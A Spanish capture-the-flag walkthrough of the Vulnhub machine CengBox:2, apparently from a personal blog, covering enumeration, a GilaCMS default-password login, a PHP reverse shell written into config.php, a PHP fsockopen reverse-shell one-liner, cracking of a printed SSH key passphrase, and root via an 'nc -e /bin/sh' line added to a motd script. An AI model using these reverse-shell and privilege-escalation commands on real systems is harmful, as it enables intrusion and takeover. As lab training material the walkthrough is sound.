[VLN] CengBox:2

Hoy vamos a hackear la maquina de Vulnhub llamada CengBox:2. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/cengbox-2,486/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    sml@Cassandra:~$ nmap -A -p- 192.168.1.103 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-28 22:45 CEST Nmap scan report for cengbox.home (192.168.1.103) Host is up (0.00033s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 0 0 209 May 23 07:21 note.txt | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.1.148 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 4 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:99:9d:e0:bc:07:3c:4f:53:e5:bc:27:35:80:e4:9e (RSA) | 256 fe:60:a1:10:90:98:8e:b0:82:02:3b:40:bc:df:66:f1 (ECDSA) |_ 256 3a:c3:a0:e7:bd:20:ca:1e:71:d4:3c:12:23:af:6a:c3 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site Maintenance Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.32 seconds
    Nos conectamos al ftp como usuario anonymous para ver si hay alguna pista.
    sml@Cassandra:~$ ftp 192.168.1.103 Connected to 192.168.1.103. 220 (vsFTPd 3.0.3) Name (192.168.1.103:sml): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> dir 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 209 May 23 07:21 note.txt 226 Directory send OK. ftp> get note.txt local: note.txt remote: note.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for note.txt (209 bytes). 226 Transfer complete. 209 bytes received in 0.00 secs (276.1862 kB/s) ftp>
    Leemos el fichero note.txt
    sml@Cassandra:~$ cat note.txt Hey Kevin, I just set up your panel and used default password. Please change them before any hack. I try to move site to new domain which name is ceng-company.vm and also I created a new area for you. Aaron
    Al leer la nota, vemos que habla de un dominio, asi que agregamos el dominio ceng-company.vm al fichero /etc/hosts. Hacemos bruteforce de los subdominios para ver si encontramos algo interesante.
    sml@Cassandra:~$ gobuster vhost -u ceng-company.vm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
    Vemos que ha aparecido el dominio admin.ceng-company.vm. Lo agregamos tambien al fichero /etc/hosts. Echamos un vistazo al nuevo dominio.
    sml@Cassandra:~$ gobuster dir -u http://admin.ceng-company.vm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,htm,txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://admin.ceng-company.vm [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: php,html,htm,txt [+] Timeout: 10s =============================================================== 2020/05/29 19:58:03 Starting gobuster =============================================================== /server-status (Status: 403) /gila (Status: 301) =============================================================== 2020/05/29 20:03:17 Finished ===============================================================
    Encontramos el directorio gila. Al explorarlo vemos que se tratra de GilaCMS.
  • Low Shell
  • Visitamos http://admin.ceng-company.vm/gila/admin y vemos que nos pide user y pass. En la nota anterior mencionaban al usuario kevin, asi que "suponiendo" ponemos de usuario: kevin@ceng-company.vm. El password, tras probar los tipicos, el bueno es: admin Asi que los credenciales son: kevin@ceng-company.vm/admin Preparamos una reverse shell en php.
    sml@Cassandra:~$ cp /usr/share/webshells/php/php-reverse-shell.php . sml@Cassandra:~$ mv php-reverse-shell.php shell.php sml@Cassandra:~$ nano shell.php #Modificamos para poner nuestros datos.
    En el GilaCMS, vamos a content filemanager y modificamos el fichero config.php para que tenga el contenido de nuestra reverse shell. Una vez guardado, ponemos nc a la escucha:
    sml@Cassandra:~$ nc -nlvp 1234
    Y visitamos: http://admin.ceng-company.vm/gila/config.php
    sml@Cassandra:~$ nc -nlvp 1234 listening on [any] 1234 ... connect to [192.168.1.148] from (UNKNOWN) [192.168.1.103] 55508 Linux cengbox 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux 11:47:36 up 7:48, 0 users, load average: 0.00, 0.00, 0.08 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $
    Ahora que estamos dentro, miramos que podemos hacer.
    $ sudo -l Matching Defaults entries for www-data on cengbox: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/ snap/bin User www-data may run the following commands on cengbox: (swartz) NOPASSWD: /home/swartz/runphp.sh
    Vemos que usando sudo, podemos ejecutar un script como el usuario "swartz".
    $ cd /home/swartz $ ls -la total 44 drwxr-xr-x 4 swartz swartz 4096 May 26 05:05 . drwxr-xr-x 4 root root 4096 May 23 04:57 .. -rw------- 1 swartz swartz 1 May 26 07:16 .bash_history -rw-r--r-- 1 swartz swartz 220 Aug 31 2015 .bash_logout -rw-r--r-- 1 swartz swartz 3771 Aug 31 2015 .bashrc drwx------ 2 swartz swartz 4096 May 23 12:48 .cache drwx------ 2 swartz developers 4096 May 26 05:05 .gnupg -rw------- 1 swartz developers 1 May 26 07:16 .php_history -rw-r--r-- 1 swartz swartz 655 May 16 2017 .profile -rw------- 1 swartz developers 1 May 26 07:17 .viminfo -rwxr-xr-x 1 swartz swartz 20 May 26 03:17 runphp.sh
    Miramos el codigo.
    $ cat runphp.sh #!/bin/bash php -a
    El codigo nos va a dejar ejecutar php de forma interactiva. Asi que lo utilizaremos para obtener una shell. Ponemos nuestro nc a la escucha.
    nc -nlvp 5555
    Y para obtener la shell...
    $ sudo -u swartz /home/swartz/runphp.sh Interactive mode enabled No entry for terminal type "unknown"; using dumb terminal settings. $sock=fsockopen("192.168.1.148",5555); exec("/bin/sh -i <&3 >&3 2>&3");
    Obtenemos la shell como swartz :)
    sml@Cassandra:~$ nc -nlvp 5555 listening on [any] 5555 ... connect to [192.168.1.148] from (UNKNOWN) [192.168.1.103] 34744 /bin/sh: 0: can't access tty; job control turned off $ id uid=1001(swartz) gid=1002(developers) groups=1002(developers)
    Vemos que swartz pertenece al grupo developers. Dicho grupo puede leer las keys ssh que se encuentran en el directorio /home/mitnick.
    $ groups developers $ cd /home/mitnick $ ls -la total 48 drwxr-x--- 4 mitnick developers 4096 May 25 13:56 . drwxr-xr-x 4 root root 4096 May 23 04:57 .. -rw------- 1 mitnick mitnick 1 May 26 07:17 .bash_history -rw-r--r-- 1 mitnick mitnick 220 May 23 03:57 .bash_logout -rw-r--r-- 1 mitnick mitnick 3771 May 23 03:57 .bashrc drwx------ 2 mitnick mitnick 4096 May 23 04:01 .cache -rw------- 1 mitnick mitnick 505 May 23 06:21 .mysql_history -rw------- 1 mitnick mitnick 1 May 26 07:18 .php_history -rw-r--r-- 1 mitnick mitnick 655 May 23 03:57 .profile drwxr-x--- 2 mitnick developers 4096 May 25 14:08 .ssh -rw------- 1 mitnick mitnick 1 May 26 07:17 .viminfo -rw------- 1 mitnick mitnick 33 May 23 13:31 user.txt $ cd .ssh $ ls authorized_keys id_rsa id_rsa.pub $ ls -l total 12 -rw-r--r-- 1 mitnick developers 397 May 25 14:08 authorized_keys -rw-r--r-- 1 mitnick developers 1766 May 25 14:07 id_rsa -rw-r--r-- 1 mitnick developers 397 May 25 14:07 id_rsa.pub
    Miramos la key id_rsa.
    $ cat id_rsa -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,21425CA12E394F02C77645793C350D91 jOzfhmCwJQ8eqkzxuAgaXxy8Nh0AL1NR2dXz0tZVbSRRKdUcAeXQFkNYdAH+InjR mg0FUtcz69l5iomrBHd71ZnK4iQMVcZZ37r8fAQppvZVGhKbf5DGmnyDZiTxGtdv O6kEQOXOAVUce+bMDEgChMEdORmk2yisizjDi9IMttWQ3VMyaHoyRp2UOCjntZPC KcpQMGjWJEos3ZrlIrfX/FSkfT0QkwdzkigeJsC7zH0AioH55tdfAY8d33AJuSQ0 7I7z5qMfn7tfNd8n642xFGnRV2YMCYiO8XB0f5OJz67T4doagB985ZNDtqJdxkoF kXlqdvs1KJzCAMu9m0m4UV7ZR7qmYKiFXnEkl/hE9i3CF9S6UOjKKRZq26TpJVj4 a4WJ+yauszPVI9KlnB7X9g5cd3Xoe04ROWbaVhx0tv3ipjcbGOPcuQudiMH8P0rj pXI0YD/nDSV9gCqfgi0wJTag8LK+4ZUENHu3ThukuONCGZpkdJg/UETu9m8Cl8CR pa4khXbI+1J7frvqUFq+op3CBT4GccKUbD4B/Sa2BLjsOV75A/tpffr2ROo8KxaL HFHJUqwhTCk6qp5Hx6tQWtaUQ7gdOJ1BMARts/x3rGpphdmSwqZqusdrw/KS3TbH VkjpO5lABvEMGl2/HbB2flEZk+fkJ3YNq78+IQSxNSDFPsAIMySFmro+tf9X7KWu hna6795X13c+WdE5hEsK6X2bOkZhFln/6Rkz5BsWNlaBVQwYfthfepN+e4NwdtcT e/NZt/Cppe+J74ABmC8FyKVr+sbnb2MWWwg2nQ9aPEcDinjWk7ALtJbwIG46Udb9 l/c8/RSot4rRA3ADHj5JZtEAnnrwCHO7cc4yGLEJOneSPxz4yW8vSGDd7iAWjYuE Y0CDY6iH2cvi3rrVrfUZ1beHMcegRtsTgPj2tbd7x4FD6xY+Vha+Va/OV6F7kuE7 fgS5uJs/WqCVemQWKLfa22AMeCRn5qB9AT1gAGbH5oFlrOtOvvbpZsdiRSp86mx5 /Pzrio/5e0kZ1b4+PF1cUOzFJOVOADl8hGQxE9LYOozxKGdSEP1oJOhThCGQVK8W cQZ91RSt5tbQbhO3T4r8whOgOFyf3N/jEJ2IBzFKDZAqn0oxUzQFcBnsYIMhO29F bTH6WyWaIy97HxSEzMmMUJo78n8uptNkglFPYp0LTzTEXsEYC6WxGBIihXQHEJlJ 1XxTCMoZFkZ2IpL9TmRtdWcqKBjiXLXuPjpMaIlg3tL8AEqR92stCPpyIVkfsxRf j+FgaA97zTv8je+uGIAyv3fl3W69LOsMSTGwZutxngBsyhK3FbzF5r1c6c55jxXK Tj+QuvPjLwGNT9KQ3XT4oGe5KSiSQ3ZhA4K1AhGyfCxhA2hdK7Y9RZVxKISCzjsY 4oNeFNZKIhTIWITNcr4/ebGiQuyLyOQpTgP6kpiLDYcZlPdIjdBAEjF+5rVcuxfB xtHilk7LLiLarD6lFaF4bYoB2lwW0ioUzvZYUjLIT7RyrDa6tnidXI9aVAWgLFor xi3Ed0lgkxkFm6AFQ0Zq1R8MqI4+6apX4nqqV/ybGpBFwpjgI//mOlHf9kdxp0Pk -----END RSA PRIVATE KEY-----
    Nos la copiamos a nuestra maquina y usamos john para crackear la key y obtener el passphrase.
    sml@Cassandra:~$ nano kevin.key sml@Cassandra:~$ chmod 600 kevin.key sml@Cassandra:~$ python /usr/share/john/ssh2john.py kevin.key > kevin.hash sml@Cassandra:~$ /usr/sbin/john kevin.hash --wordlist=rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 4 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status legend (kevin.key) Warning: Only 2 candidates left, minimum 4 needed for performance. 1g 0:00:00:04 DONE (2020-05-29 22:31) 0.2173g/s 3117Kp/s 3117Kc/s 3117KC/sa6_123..*7¡Vamos! Session completed
    Vemos que es legend, sabiendo esto, nos logueamos.
  • user.txt
  • sml@Cassandra:~$ ssh -i kevin.key mitnick@192.168.1.103 Enter passphrase for key 'kevin.key': * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 176 packages can be updated. 129 updates are security updates. Last login: Tue May 26 07:12:16 2020 from 192.168.0.14 To run a command as administrator (user "root"), use "sudo ". See "man sudo_root" for details. mitnick@cengbox:~$ cat user.txt a10333b0b7c3f914e8c446fd8e9cd362
  • Privilege Escalation
  • Nos descargamos pspy64 y nc.
    mitnick@cengbox:~$ wget http://192.168.1.148/pspy64 mitnick@cengbox:~$ chmod +x pspy64 mitnick@cengbox:~$ wget http://192.168.1.148/nc mitnick@cengbox:~$ chmod +x nc
    Ejecutamos pspy64, y mientras se ejecuta, en otro terminal nos volvemos a loguear con el usuario mitnick. Al hacerlo, vemos que se ejecutan varios scripts (los del update-mot.d/*) sobre los cuales tenemos permisos de escritura.
    ---SNIP--- 2020/05/31 01:47:31 CMD: UID=0 PID=2348 | /bin/sh /etc/update-motd.d/91-release-upgrade 2020/05/31 01:47:31 CMD: UID=0 PID=2347 | /bin/sh /etc/update-motd.d/91-release-upgrade 2020/05/31 01:47:31 CMD: UID=0 PID=2346 | /bin/sh /etc/update-motd.d/91-release-upgrade 2020/05/31 01:47:31 CMD: UID=0 PID=2345 | /bin/sh /etc/update-motd.d/91-release-upgrade 2020/05/31 01:47:31 CMD: UID=0 PID=2349 | /bin/sh -e /usr/lib/ubuntu-release-upgrader/release-upgrade-motd ---SNIP---
    Sabiendo esto, modificaremos el fichero /etc/update-motd.d/00-header, y le agregaremos la siguiente linea:
    /home/mitnick/nc -e /bin/sh 192.168.1.148 3333
    En otra terminal pondremos nc a la escucha...
    sml@Cassandra:~$ nc -nlvp 3333
    Y por ultimo, en una tercera terminal, nos loguearemos de nuevo como el usuario mitnick. Si todo ha ido bien, obtendremos una shell de root :)
    sml@Cassandra:~$ nc -nlvp 3333 listening on [any] 3333 ... connect to [192.168.1.148] from (UNKNOWN) [192.168.1.103] 52438 id uid=0(root) gid=0(root) groups=0(root)
  • root.txt
  • cd /root ls root.txt cat root.txt _____ ______ ____ ___ / ____| ____| | _ \ |__ \ | | | |__ _ __ __ _| |_) | _____ __ ) | | | | __| | '_ \ / _` | _ < / _ \ \/ / / / | |____| |____| | | | (_| | |_) | (_) > < / /_ \_____|______|_| |_|\__, |____/ \___/_/\_\____| __/ | |___/ I would be grateful for your any feedback. Feel free to contact me on Twitter @arslanblcn_ de89782fe4e8bf2198a022ae7f50613e
  • End
  • Y con esto ya seriamos root de la maquina :)